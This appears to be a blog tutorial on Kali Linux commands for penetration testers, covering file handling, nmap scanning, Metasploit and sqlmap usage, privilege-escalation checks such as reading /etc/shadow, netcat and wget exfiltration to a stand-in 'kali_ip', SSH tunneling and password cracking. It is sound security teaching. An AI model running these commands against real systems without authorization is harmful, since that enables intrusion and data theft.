Kali Linux Commands for Pentesters & Bug Bounty Hunters
Mastering fundamental Kali Linux commands is non-negotiable for anyone serious about penetration testing, bug bounty hunting, or red team operations. These commands are the bedrock of efficient security assessments, allowing you to navigate systems, perform reconnaissance, exploit vulnerabilities, and manage data with precision. Without a solid grasp, you'll find yourself fumbling with GUI tools or missing critical details hidden in the command line output, significantly slowing down your work and potentially missing vulnerabilities.
From my years in the field, I can tell you that the most effective pentesters aren't just great with tools; they're command-line wizards. They know how to chain commands, pipe outputs, and script repetitive tasks, saving hours and revealing insights others miss. This post will walk you through the essential Kali Linux commands, giving you practical examples and the context you need to use them effectively in real-world scenarios.
Core System & File Management Kali Linux Commands
Before you can exploit systems, you need to navigate your own and understand how to manage files. These are the bread-and-butter commands you'll use daily.
Navigating the Filesystem
pwd(Print Working Directory): Shows your current location. Simple, but crucial when you're deep in directories.ls(List): Displays the contents of a directory.ls -l: Long listing format, showing permissions, owner, size, date.ls -a: Shows all files, including hidden ones (dotfiles).ls -la: Combines both. I use this constantly.
cd(Change Directory): Moves you between directories.cd /path/to/directory: Absolute path.cd ../: Go up one level.cd ~: Go to your home directory.cd -: Go back to the previous directory. Invaluable for quick jumps.
mkdir(Make Directory): Creates new directories. Usemkdir -p /path/to/new/dirto create parent directories if they don't exist.
File Operations
cp(Copy): Copies files or directories.cp file1.txt /tmp/file1.txtcp -r dir1/ /tmp/dir1_copy/: For directories, use-r(recursive).
mv(Move): Moves or renames files/directories.mv old_name.txt new_name.txt: Rename.mv file.txt /new/location/: Move.
rm(Remove): Deletes files or directories. Be extremely careful with this one!rm file.txtrm -r directory/: Recursive deletion for directories.rm -rf directory/: Force recursive deletion without prompting. This is how you delete things permanently, quickly, and potentially disastrously if you're not paying attention.
Viewing & Manipulating File Content
cat(Concatenate): Displays the entire content of a file. Good for small files.cat /etc/passwd
less: A pager that allows you to view file content page by page. Much better for large files thancat. Useqto quit.head/tail: View the beginning or end of a file.head -n 10 file.txt: First 10 lines.tail -n 10 file.txt: Last 10 lines.tail -f /var/log/auth.log: Follows a file as it's written, great for monitoring logs in real-time.
grep(Global Regular Expression Print): Searches for patterns within files. An absolute workhorse for log analysis and finding specific data.grep "error" /var/log/syslog: Find lines containing "error".grep -i "admin" users.txt: Case-insensitive search.grep -r "password" /etc/: Recursive search for "password" in all files under /etc/.ps aux | grep "apache": Pipe output fromps auxtogrepto find Apache processes. This command chaining is where the real power lies.
find: Searches for files and directories based on various criteria.find . -name "*.php": Find all PHP files in the current directory and subdirectories.find / -user root -perm /4000: Find SUID files owned by root across the system. Critical for privilege escalation paths.
Key Takeaway: Mastergrepandfind. They are your eyes and ears for discovering interesting files, configurations, and sensitive data across compromised systems or during reconnaissance. They'll save you countless hours.
Network Reconnaissance & Scanning Kali Linux Commands
Reconnaissance is the first step of any engagement. These Kali Linux commands help you gather information about your target network and hosts.
Basic Network Utilities
ifconfig/ip a: Display network interface configurations.ifconfigis older but still widely used;ip ais the modern replacement.ip a show eth0: Show details for a specific interface.
ping: Test network connectivity to a host.ping -c 4 8.8.8.8: Send 4 ICMP packets.
netstat/ss: Display network connections, routing tables, interface statistics.ssis faster and more efficient thannetstat.netstat -tunlp: Show TCP/UDP listening ports and associated processes (requires root).ss -tunlp: The equivalent withss.
dig(Domain Information Groper): Query DNS servers for domain information.dig example.com A: Get A record.dig @ns1.example.com example.com AXFR: Attempt zone transfer (often fails but worth a try).
whois: Retrieve WHOIS information for a domain. Useful for finding domain registrant details.whois example.com
Port Scanning & Service Enumeration with Nmap
Nmap (Network Mapper) is arguably the most important reconnaissance tool. Knowing its options is critical.
nmap -sS target.com: Stealth SYN scan. This is generally the fastest and least intrusive scan type.nmap -sT target.com: TCP Connect scan. A full TCP handshake, noisier but works without raw packet privileges.nmap -sU target.com: UDP scan. Essential for finding UDP services, but often very slow.nmap -p- target.com: Scan all 65535 ports. Takes longer but ensures you don't miss anything.nmap -sV target.com: Service version detection. Identifies the specific software and version running on open ports. Crucial for finding known vulnerabilities.nmap -O target.com: OS detection. Tries to guess the operating system.nmap -sC target.com: Run default Nmap scripts. These scripts automate various common tasks, like vulnerability detection, brute-forcing, and more.nmap -A target.com: Aggressive scan (combines -O, -sV, -sC, and traceroute). A good starting point for a comprehensive scan.nmap -T4 target.com: Set timing template (0-5, 5 is fastest, 0 is slowest). T4 is a good balance for most networks.
Here's a quick comparison of Nmap scan types:
| Scan Type | Command | Description | Detection Risk | Speed |
|---|---|---|---|---|
| SYN Scan (Half-open) | -sS |
Sends SYN, waits for SYN/ACK, then sends RST. Doesn't complete 3-way handshake. | Low (often stealthier) | Fast |
| TCP Connect Scan | -sT |
Completes 3-way TCP handshake. Relies on OS connect() call. |
Higher (full connection) | Moderate |
| UDP Scan | -sU |
Sends UDP packets to common ports. Very slow due to UDP's stateless nature. | Moderate (IDS may flag) | Slow |
| Version Detection | -sV |
Probes open ports to determine service/application version. | Moderate | Adds time to scan |
| OS Detection | -O |
Attempts to determine target OS using TCP/IP fingerprinting. | Moderate | Adds time to scan |
For more detailed Nmap usage, check out the official Nmap documentation.
Web & DNS Enumeration
gobuster/dirb: Directory and file brute-forcing tools for web servers.gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt: Scan for common directories/files.
dnsrecon: Comprehensive DNS enumeration script.dnsrecon -d example.com -a: Enumerate all records, including zone transfer attempts.
Key Takeaway: Nmap is your best friend for network recon. Learn its flags inside out. Combine it withgobusteranddnsreconfor a complete picture of your target's exposed attack surface.
Vulnerability Analysis & Exploitation Kali Linux Commands
Once you've identified potential targets, it's time to find and exploit vulnerabilities.
Metasploit Framework
The Metasploit Framework is the industry standard for exploitation. Its command-line interface, msfconsole, is where you'll spend a lot of time.
msfconsole: Starts the Metasploit console.- Inside
msfconsole:search: Find modules. Example:search smb.use: Load an exploit or auxiliary module. Example:use exploit/windows/smb/ms17_010_eternalblue.show options: Display required and optional parameters for the loaded module.set RHOSTS: Set the target IP address.set LHOST: Set your listening IP for reverse shells.set LPORT: Set your listening port.runorexploit: Execute the module.show payloads: Show compatible payloads for an exploit.set payload: Select a payload. Example:set payload windows/meterpreter/reverse_tcp.back: Go back to the previous context.exit: Exit Metasploit.
Exploit Discovery & Web Vulnerability Scanners
searchsploit: A command-line tool to search the Exploit-DB archive for publicly available exploits. It's stored locally on your Kali machine.searchsploit windows smb: Find Windows SMB exploits.searchsploit -m 42315: Mirror (copy) an exploit to your current directory for review.
sqlmap: Automated SQL injection tool. This thing is incredibly powerful and can often find and exploit SQLi vulnerabilities that human eyes might miss.sqlmap -u "http://target.com/page.php?id=1" --batch --risk=3 --level=5 --dump: A common command to test a URL, automatically answer questions, use high risk/level checks, and dump data if successful.- For a deeper dive into SQL injection techniques, you might find our post SQL Injection Explained: A Deep Dive for Pentesters & Bug Bounty Hunters useful.
nikto: A web server scanner that checks for known vulnerabilities, misconfigurations, and outdated software.nikto -h http://target.com: Scan a web server.
wpscan: A specialized scanner for WordPress installations, checking for plugin vulnerabilities, theme issues, and user enumeration.wpscan --url http://target.com --enumerate vp,vt,u: Enumerate vulnerable plugins, themes, and users.
Key Takeaway: Metasploit is your primary weapon for exploitation. Combine it withsearchsploitfor finding public exploits andsqlmapfor automated SQLi. These tools significantly accelerate your vulnerability assessment process.
Post-Exploitation & Data Exfiltration Commands
Once you've gained initial access, the real fun begins: maintaining persistence, escalating privileges, and exfiltrating data.
System Information & Privilege Escalation
whoami: Displays the current user ID and name. Essential to know your current privilege level.id: Show user and group IDs. More detailed thanwhoami.uname -a: Prints all system information, including kernel version. Crucial for identifying potential kernel exploits.ps aux: Lists all running processes. Look for interesting processes, suspicious executables, or processes running with elevated privileges.netstat -tunlp: (As seen before) Identifies listening network services. Look for services running as root or unusual ports.sudo -l: Lists commands the current user can run withsudowithout a password. A common privilege escalation vector.find / -perm /4000 2>/dev/null: Searches for SUID (Set User ID) files. These can be executed with the permissions of the file owner, often root.cat /etc/passwd/cat /etc/shadow: View user accounts and (hashed) passwords. Often need root to view/etc/shadow.crontab -l: Lists scheduled jobs for the current user. Look for cron jobs running as root that you might be able to modify.
File Transfer & Data Exfiltration
Getting files onto or off a target system is a critical skill. Here are common methods:
| Method | Description | Kali Command (Example) | Target Command (Example) | Notes |
|---|---|---|---|---|
| SCP (SSH) | Securely copy files over SSH. Requires SSH access. | scp file.txt user@target:/tmp/ |
scp user@kali_ip:/path/file.txt . |
Reliable, encrypted. Assumes SSH server running on target/Kali. |
| Wget / Curl | Download files from a web server. | (Kali: host web server) | wget http://kali_ip/file.txtcurl -O http://kali_ip/file.txt |
Simple, often works even with limited shells. Kali needs a web server. |
| Python SimpleHTTPServer | Quickly set up a temporary web server on Kali. | python3 -m http.server 80 |
(Target: use wget/curl) | Very convenient for serving files from Kali. |
| Netcat (nc) | Read/write data across network connections. Flexible but unencrypted. | Kali Listener: nc -lvp 4444 > received.txt |
Target Sender: nc kali_ip 4444 < send.txt |
Good for quick transfers, but traffic is cleartext. |
| SMB Share | Use Samba to share files from Kali. | Kali: Configure Samba share. | Target (Windows): net use X: \\kali_ip\sharecopy X:\file.exe . |
Common in Windows environments. |
Tunneling & Port Forwarding
ssh -R 8080:localhost:80 user@remoteserver: Remote port forwarding. Makes a local port on your Kali machine (e.g., 80) accessible from a remote server via a tunnel.ssh -L 8080:target_internal_ip:80 user@remoteserver: Local port forwarding. Access an internal service from your Kali machine via an SSH tunnel through a pivot host.chisel/socat: More advanced tools for creating tunnels and relays, often used for bypassing firewalls or moving laterally within a network.
Key Takeaway: Post-exploitation is about persistence and expanding your reach. Always look for SUID files, scheduled tasks, and exposed credentials. Learn multiple file transfer methods; one will always work when others fail.
Essential Utilities & Productivity Kali Linux Commands
Beyond the core security tools, several general Linux commands will dramatically boost your efficiency.
Text Processing & Data Manipulation
cut: Extracts sections from each line of files.cat ips.txt | cut -d'.' -f1,2: Extract first two octets of IPs.
awk: A powerful pattern-scanning and processing language. Excellent for complex text manipulation.cat logs.txt | awk '{print $1, $4}': Print the first and fourth fields of each line.
sed(Stream Editor): Used for basic text transformations on an input stream.sed 's/old_text/new_text/g' file.txt: Replace all occurrences of 'old_text' with 'new_text'.
sort: Sorts lines of text files.cat list.txt | sort -u: Sort and remove duplicate lines.
uniq: Reports or omits repeated lines. Often used aftersort.cat list.txt | sort | uniq -c: Count unique occurrences of lines.
Session Management & History
tmux/screen: Terminal multiplexers that allow you to run multiple terminal sessions within a single window, detach from them, and reattach later. Indispensable for long-running processes or maintaining sessions across SSH disconnects.history: Shows your command history.!n: Execute the n-th command from history.history | grep nmap: Search your history for Nmap commands.CTRL+R: Reverse search history. Start typing, and it will find previous commands. This is a massive time-saver.
alias: Create custom shortcuts for frequently used commands.alias update="sudo apt update && sudo apt full-upgrade -y": Create an alias for updating Kali.- Add aliases to your
~/.bashrcor~/.zshrcfor persistence.
Archiving & Compression
tar: Archive utility.tar -czvf archive.tar.gz /path/to/directory: Create a gzipped archive.tar -xzvf archive.tar.gz: Extract a gzipped archive.
zip/unzip: For working with ZIP archives.
Password Cracking & Hashing
john(John the Ripper): A fast password cracker.john --wordlist=rockyou.txt hash.txt: Crack hashes using a wordlist.
hashcat: The world's fastest CPU-based password cracker (also supports GPU).hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt: Crack MD5 hashes with rockyou.txt. (Mode 0 is MD5).
openssl: A versatile toolkit for cryptography. Useful for generating certificates, hashing, encryption, and more.openssl passwd -1 -salt mysalt "password": Generate an MD5 crypt hash.
Key Takeaway: Don't overlook productivity tools.tmuxwill save your sanity,grep/awk/sedwill make you a data processing guru, andhistory/aliaswill speed up your workflow significantly.
Staying Updated & Troubleshooting Kali Linux Commands
Keeping your Kali system current and knowing how to troubleshoot problems is vital for a smooth workflow.
System Updates & Package Management
sudo apt update: Refreshes the list of available packages from your configured repositories. Do this frequently.sudo apt full-upgrade -y: Upgrades all installed packages to their latest versions, handling dependency changes. The-yflag answers 'yes' to prompts.- Pro-tip: Run
sudo apt update && sudo apt full-upgrade -yregularly, perhaps once a week, to keep your tools sharp and secure.
- Pro-tip: Run
sudo apt install: Installs a new package. Example:sudo apt install wireshark.sudo apt remove: Removes a package.sudo apt autoremove: Removes packages that were automatically installed to satisfy dependencies for other packages and are no longer needed. Cleans up your system.dpkg -l: Lists all installed Debian packages. Great for auditing what's on your system.
Troubleshooting & Service Management
systemctl status: Checks the status of a systemd service (e.g., Apache, SSH).systemctl start apache2: Start a service.systemctl stop apache2: Stop a service.systemctl enable apache2: Enable a service to start on boot.
journalctl -xe: Displays recent systemd journal entries, including errors and warnings. A primary source for debugging system issues.dmesg: Prints the kernel ring buffer messages. Useful for hardware-related issues or driver problems.
Key Takeaway: Regular updates are critical for a penetration testing distro like Kali. New exploits and tools appear constantly, and outdated software can introduce vulnerabilities or compatibility issues. Don't skip your apt update && apt full-upgrade!
Frequently Asked Questions
What are the most essential Kali Linux commands for beginners?
For beginners, focus on core system navigation and file management commands like ls, cd, pwd, cp, mv, rm, and viewing file content with cat or less. Also, grasp network basics with ping and the powerful port scanner nmap, starting with simple SYN scans.
How can I update my Kali Linux system and tools?
To update your Kali Linux system and all its tools, open a terminal and run sudo apt update && sudo apt full-upgrade -y. This command first refreshes the package lists and then upgrades all installed packages to their latest versions, ensuring you have the most current and secure tools.
Is Kali Linux difficult to learn for someone new to Linux?
Kali Linux can be challenging for complete Linux newcomers due to its command-line focus and specialized tools. However, with dedication to learning fundamental Linux commands and understanding networking concepts, it's certainly manageable. Start with basic commands, practice regularly, and explore available tutorials to build your skills gradually.
What is the difference between apt update and apt upgrade?
apt update fetches the latest package information from the repositories but doesn't install or upgrade anything. It essentially updates the list of available packages. apt upgrade (or apt full-upgrade for Kali) then uses this updated list to actually install newer versions of your installed packages.